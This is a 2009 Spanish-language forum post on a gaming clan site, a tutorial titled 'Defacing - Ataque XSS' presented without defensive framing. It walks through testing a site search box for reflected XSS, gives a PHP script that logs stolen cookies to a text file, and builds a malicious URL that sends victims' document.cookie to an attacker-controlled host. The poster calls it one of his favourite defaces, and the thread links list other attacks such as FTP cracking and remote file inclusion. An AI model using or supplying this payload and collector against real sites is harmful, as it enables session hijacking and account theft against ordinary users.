XFBr Clan
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

XFBr Clan

Pagina Oficial Del clan XFBr
 
ÍndicePortalGaleríaÚltimas imágenesBuscarRegistrarseConectarse

 

 |- Defacing - Ataque XSS -|

Ir abajo 
AutorMensaje
MeXiCoOl28
FFA Pro
MeXiCoOl28


Cantidad de envíos : 38
Edad : 32
Localización : €N M! PC
Reputacion :
|- Defacing - Ataque XSS -| Left_bar_bleue100 / 100100 / 100|- Defacing - Ataque XSS -| Right_bar_bleue

Infracciones :
|- Defacing - Ataque XSS -| Left_bar_bleue0 / 1000 / 100|- Defacing - Ataque XSS -| Right_bar_bleue

Reputación : 0
Puntos : 0
Fecha de inscripción : 26/11/2008

|- Defacing - Ataque XSS -| Empty
MensajeTema: |- Defacing - Ataque XSS -|   |- Defacing - Ataque XSS -| I_icon_minitimeMiér Ene 28, 2009 4:16 am

Ataque XSS


Comencemos con una pequeña introducción sobre está técnica. Pongamos un ejemplo de una
web que utilice cookies y tenga un buscador interno.

Cookies

Una cookie es un almacén de información que se guarda en el ordenador del usuario y en
cualquier momento la pagina puede pedir la información, que contiene la cookie, al
ordenador del usuario...
Ahora que sabemos que es una cookie lo que vamos a hacer es ver el nombre de la página
donde se encuentra el buscador, en nuestro caso es buscador.php

Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador,
por ejemplo:

Código:
<script>alert()</script>

Si salta una alarma al pulsar el botón, significa que ese buscador es vulnerable.

Suponiendo que sea vulnerable, el siguiente paso es ver el nombre del formulario y del botón.
Para esto, tenemos que ver el código fuente de dicha página y buscar algo como:


Código:
<input type="text" name="palabra">          Este sería el Formulario
<input type="submit" name="buscar" value="Buscar">   Este sería el Botón

Ahora ya sabemos que el formulario se llama palabra y que el botón se llama buscar.

Para almacenar las cookies, tenemos dos opciones

1º Almacenarlas en una base de datos (MySql).
2º Almacenarlas en un archivo de texto (Recomendable).

A continuación vamos a crear una pagina en php, este archivo creará otro (archivo.txt)
cuando algún usuario caiga en el ataque y escribirá a continuación los siguientes
usuarios:

Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

ARCHIVO.TXT
Este archivo se creará automáticamente y será en el que se almacenen las cookies, osea,
que para ver los resultados tienes que entrar en este archivo.

Una vez hecho este paso solo tenemos que crear "LA URL" que será de la siguiente forma:

Citación :
http://www.vulnerable.com/buscador.php?palabra=<script>window.location=
'http://www.atacante.com/cookies.php?cookie='+document·cookie;</script>&buscar=;

Y hasta aki llega el tuto este es uno de mis defaces favoritos jejeje saludos y comenten...

PROXIMAMENTE MAS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! cheers cheers cheers cheers cheers cheers cheers cheers
Volver arriba Ir abajo
http://www.hackelite.net
 
|- Defacing - Ataque XSS -|
Volver arriba 
Página 1 de 1.
 Temas similares
-
» Defacing - Cracking FTP
» Defacing - Bug Unicode
» Defacing - Inyection HTML
» Defacing - Remote File Inclusion

Permisos de este foro:No puedes responder a temas en este foro.
XFBr Clan :: Off Topic :: Software-
Cambiar a: